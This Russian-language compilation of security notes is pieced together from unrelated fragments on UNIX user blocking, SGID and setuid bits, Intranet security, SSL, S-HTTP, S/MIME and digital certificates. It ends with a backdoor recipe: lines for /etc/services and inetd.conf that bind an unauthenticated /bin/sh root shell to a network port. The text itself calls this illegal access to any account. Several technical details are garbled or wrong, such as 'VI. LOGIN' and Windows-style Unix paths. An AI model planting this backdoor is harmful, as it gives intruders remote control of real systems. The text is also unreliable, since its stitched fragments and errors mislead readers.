Хаккеры

Поскольку ядро контролирует поведение вашего компьютера в сети, очень важно, чтобы ядро было само очень безопасно, и его нельзя было каким-либо образом взломать или подвергнуть риску. Чтобы предотвратить некоторые из последних известных методов сетевых атак, вы должны использовать последние стабильные версии ядра.

Еще такой момент. UNIX дает возможность блокировать некоторых пользователей и ограничивать им доступ к системе.

Для начала вы выбираете гражданина, которому собираетесь закрыть доступ. Затем помещаете в его начальный каталог (тот, который UNIX автоматически загружает при входе в систему) файл VI. LOGIN.

VI. LOGIN должен выглядеть примерно так:

VI. LOGIN logout

Таким образом, VI. LOGIN будет включать в себя только одну единственную команду. Она срабатывает автоматически: как только этот пользователь попытается войти в систему, вход в нее окажется заблокирован.

Важно: каждые несколько дней проверяйте в силе ли ваше блокирование, а блокирование особо значимых для вас пользователей можно проверять и чаще.

Эта программа должна работать под КОРНЕМ (ROOT — имя суперпользователя).

Если вы установите SGID бит для каталога (командой chmod g+s directory), то файлы, содержащиеся в этом каталоге будут иметь установки группы такие, как у каталога.

Архитектура Intranet подразумевает подключение к внешним открытым сетям, использование внешних сервисов и предоставление собственных сервисов вовне, что предъявляет повышенные требования к защите информации.

В Intranet-системах используется подход клиент-сервер, а главная роль на сегодняшний день отводится Web-сервису.

Web-серверы должны поддерживать традиционные защитные средства, такие как аутентификация и разграничение доступа; кроме того, необходимо обеспечение новых свойств, в особенности безопасности программной среды и на серверной, и на клиентской сторонах.

Таковы, если говорить совсем кратко, задачи в области информационной безопасности, возникающие в связи с переходом на технологию Intranet. Далее мы рассмотрим возможные подходы к их решению.

Позволим себе небольшое отступление…

Некоторое время назад один банкир, прочитав в каком-то дорогом журнале статью об информационной безопасности, сделал для себя вывод, что защищаться бесполезно — слишком велик арсенал потенциального злоумышленника. Он перестал рассматривать предложения по защите компьютерной системы банка, считая их заведомо бесполезными. К фаталистам этого банкира не отнесешь, однако масса технических деталей, приведенных в журнальной статье, совершенно запутала и подавила его. Сжав голову руками, он ходил из угла в угол, бормоча: «Пароли перехватываются, соединения крадутся, получить привилегии root — раз плюнуть и т. д. и т. п.» Попытки указать ему на то, что в статье допущен ряд чисто технических ошибок, что не оговорены условия, при которых возможна та или иная атака, что, наконец, отсутствует комплексный подход к проблеме безопасности, успеха не имели.

Так совпало, что вскоре дела банка, где работал наш банкир, стали идти все хуже и хуже. Более удачливые конкуренты, казалось, все время предугадывали его ходы, постоянно оказываясь на полшага впереди…

Формирование режима информационной безопасности — проблема комплексная. Меры по ее решению можно разделить на четыре уровня:

• законодательный (законы, нормативные акты, стандарты и т. п.);

• административный (действия общего характера, предпринимаемые руководством организации);

• процедурный (конкретные меры безопасности, имеющие дело с людьми);

• программно-технический (конкретные технические меры).

• команды su, newgrp, at, prwarn, sadc, ptchmod

Очень часто пользователи спрашивают о различиях между различными протоколами безопасности и шифрования, и как их использовать.

• SSL или Secure Sockets Layer, является методом шифрования разработанным Netscape для обеспечения безопасности в Сети. Он поддерживает несколько различных протоколов шифрования, и обеспечивает идентификацию (authentication) как на уровне клиента так и на уровне сервера. SSL работает на транспортном уровне, создает безопасный шифрованный канал данных, и, таким образом, может бесшовно шифровать данные многих типов. Наиболее часто это случается, когда вы посещаете защищенный узел для просмотра в режиме online секретного документа с помощью

Communicator, который обеспечивает вас базовыми услугами безопасности связи, а также многими другими видами шифрования данных.

• S-HTTP является еще одним протоколом, который реализует в Internet сервис безопасности. Он был разработан для предоставления конфиденциальности,

Опознавания, сохранности, а также non-repudiability, в то же время имея механизмы управления многими ключами и криптографические алгоритмы путем выборочного согласования между участниками в каждой транзакции. S-HTTP ограничен специфическим программным обеспечением, которое реализует его, и шифрует каждое сообщение индивидуально.

• S/MIME или Secure Multipurpose Internet Mail Extension, является стандартом шифрования, используемым в электронной почте, или других типах сообщений в Internet. Это открытый стандарт, который разработан RSA, и поэтому очень вероятно, что мы скоро увидим его в Linux.

Конечно, невозможно представить себе кодирование сообщений без использования ключей. Нельзя, однако, не признать, что никакое использование ключей не может помочь установить личность адресата сообщения.

Чтобы обеспечить безопасность сообщений, нужно решить две задачи: во-первых, обеспечить конфиденциальность информации, а во-вторых, добиться того, чтобы никто не совал в нее нос.

И тут на сцене появляется сертификат, называемый также электронной подписью. Сертификат можно уподобить электронному паспорту: благодаря ему можно убедиться, что отправитель и получатель действительно являются теми, за кого себя выдают.

Проблема тут в том, что техника не всегда может обеспечить необходимый уровень доверия. Пока мы работаем с нашей собственной кабельной системой, мы вполне ей доверяем. А что теперь? Допустим, некий сотрудник Daytona Со. хочет обратиться к информационной системе Chrysler Corp. через несколько сетей общего пользования. О каком доверии тут может идти речь? Необходимо убедиться в том, что данное лицо действительно имеет право работать с соответствующими документами.

При работе с сертификатами можно использовать две схемы. Во-первых, сертификаты может создавать и поддерживать сторонняя компания; в частности, этим занимается VeriSign. Во-вторых, любая компания сама может создавать и поддерживать сертификаты, используя при этом, например, продукт Entrust (Nortel), который к тому же обеспечивает кодирование сообщений. После того, как пользователь получает сертификат, он может использовать его в качестве своей электронной подписи.

При получении документа с электронной подписью, адресат знакомится со всей информацией, содержащейся в сертификате; к ней относится, в частности, имя отправителя, адрес отправителя и прочие данные, которые решено было включить в сертификат. Электронная подпись содержит также информацию о том, кто выдал сертификат, когда истекает срок его действия и какой уровень верификации установлен для данного сертификата.

Существуют сертификаты трех классов. Для сертификатов первого класса проверяется уникальность имени и правильность адреса электронной почты, а также то, что получатель сертификата имеет право на доступ к данному разделу электронной почты. Для второго класса мы проверяется имя, адрес, номер водительского удостоверения и полис социального страхования, а также дата рождения. Для сертификатов третьего класса проверяются все вышеперечисленные данные и осуществляется поиск по базе данных Equifax (информационное бюро по кредитам).

Сертификаты незаменимы в деле идентификации пользователей для всех организаций, озабоченных защитой данных.

Тем не менее, пользователи признают, что организация, вынужденная прибегать к использованию шифровки и работе с сертификатами, может неодобрительно отнестись к идее доверить работу с сертификатами сторонней организации.

Однако если от услуг сторонней организации будет решено отказаться, то немедленно возникнет проблема, откуда вообще возьмутся сертификаты.

С точки зрения администраторов сетей, работа с сертификатами тоже представляет определенную проблему. Если не обращаться к услугам сторонних компаний, то работа по управлению сертификатами приведет к существенному возрастанию административных накладных расходов, даже если пользоваться такой программой, как Entrust, где заложены функции управления. По большей части, сертификаты выдаются на определенный срок, например, на год. Следовательно, кто-то должен следить за их продлением. Кроме того, необходимо следить за аннулированием сертификатов увольняемых сотрудников и выдачей новых сертификатов принимаемым на работу.

Четвертый вид проблем с безопасностью касается адекватного восприятия. Хорошие программы, защищенное «железо», но вполне совместимые компоненты системы не заработают, если только вы не выберете соответствующую стратегию защиты и не включите отвечающие за безопасность сегменты системы. Даже использование самого лучшего на свете механизма пародирования не даст никакого результата, если ваши пользователи считают лучшим паролем свой собственный логин! Безопасность — это

Взаимодействие общей стратегии (или стратегий) и согласованных с ней операций.

Описывает set-user-id права на файл. Если права доступа set-user-id установлены в поле «владелец» и файл исполняемый, то процесс, который запускает его, получает доступ к системным ресурсам, основываясь на правах пользователя, который создал этот процесс. Во многих случаях это является причиной возникновения buffer overflow.

Своего рода компромиссным вариантом может стать установка новой программы, которая смогла бы запускать любую другую по вашему выбору. Лучше всего загрузить не чувствительную к несанкционированным подключениям оболочку. Вы должны убедиться в том, что доступ индицируется как в \etc\services, так и в \etc\inetd. conf. Формат \etc\services прост: (1) (2)/(3) (4) smtp 25/tcp mail

(1) — функция, (2) — номер порта, (3) — тип протокола, необходимый для работы программы, (4) — название функции.

Попробуйте добавить такую строку к \etc\services:

Evil 22/tcp evil

И такую к /etc/inetd. conf:

Evil stream tcp nowait /bin/sh sh — i Загрузите inetd.

Обратите внимание: такой нелегальный доступ в принципе весьма действенен. Он даст возможность использовать не только любой аккаунт локальной сети, но и предоставит любой аккаунт любого компьютера с выходом в Интернет.